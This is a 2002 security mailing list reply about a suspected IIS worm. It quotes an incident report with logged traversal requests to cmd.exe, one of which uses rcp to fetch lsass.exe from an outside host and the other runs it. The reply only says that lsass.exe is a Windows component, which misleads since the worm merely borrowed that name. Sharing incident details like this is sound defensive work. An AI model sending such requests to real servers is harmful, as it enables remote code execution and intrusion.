Security Incidents mailing list archives

Re: new IIS worm? (rcp lsass.exe)

From: Michael Thompson <mike () thompsonmike co uk>
Date: Mon, 23 Sep 2002 01:25:30 +0100

Hello Christian,

On Sat, 21 Sep 2002, at 20:17:48 [GMT +0200] (which was 19:17 in my
TimeZone) you wrote:




CM> hi,

CM> since about a week I notice attempts to exploit vulnerable IIS installations
CM> (they show up with snort's "WEB-IIS multiple decode attempt" signature)
CM> that seems to try and load an "lsass.exe" file via rcp.

CM> As a search of google and securityfocus turned up nothing, I'll throw in 
CM> what I gathered so far and ask if anybody can identify this: (it seems
CM> the affected customer's systems weren't vulnerable, so I don't know what
CM> the worm's further actions are).

CM> The first part is a SYN scan for port 80, with the source port set to 80, 
CM> differing ACK numbers, but the same ISN. Interestingly, it iterates over
CM> the 3rd IP address octet first, and the 4th later, probably to make the scan
CM> on the single /24 slower and less noticeable (in the case I've seen, it
CM> has some 30 seconds between packets to consecutive addresses).

CM> Then it seems to go after the web servers, sending the following:

CM> GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+. HTTP/1.0..

CM> and

CM> GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0

CM> I've been able to get hold of that lsass.exe binary (9728 bytes), but 
CM> I lack the skills to analyze it; I'll happily mail it to anybody who asks.

CM> Yes, and the IP addresse doing the scanning + exploit attempts is different
CM> from the one which provides lsass.exe; the scanning machine seems to be
CM> a solaris 2.7 default install, the rcp-server seems to be solaris 2.8.

CM> regards,

CM> cm.


lsass.exe is the Microsoft Secure Storage for 2000/NT and XP. It is
responsable for managing secure storage in those enviroments.

-- 
Best regards,
 Michael

http://wwww.thompsonmike.co.uk/
PGP KeyID := 0x3CC985FA
  

I just can't put it down. 



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Current thread:

new IIS worm? (rcp lsass.exe) Christian Mock (Sep 22)
- Re: new IIS worm? (rcp lsass.exe) Björn Wallentinus (Sep 22)
- Re: new IIS worm? (rcp lsass.exe) Michael Thompson (Sep 23)
  - Re: new IIS worm? (rcp lsass.exe) Nick FitzGerald (Sep 24)
- Re: new IIS worm? (rcp lsass.exe) Mike Lewinski (Sep 23)
  - Re: new IIS worm? (rcp lsass.exe) Lasse Sundström (Sep 24)
- Re: new IIS worm? (rcp lsass.exe) Nick FitzGerald (Sep 23)
- <Possible follow-ups>
- Re: new IIS worm? (rcp lsass.exe) Mike Lewinski (Sep 23)
- Re: new IIS worm? (rcp lsass.exe) pj (Sep 24)
- RE: new IIS worm? (rcp lsass.exe) Bellenger, Bruno (Paris) (Sep 24)
  - Slapper worm DoS james (Sep 24)
- Re: new IIS worm? (rcp lsass.exe) Mike Lewinski (Sep 24)
  - Re: new IIS worm? (rcp lsass.exe) Eloy A. Paris (Sep 24)

(Thread continues...)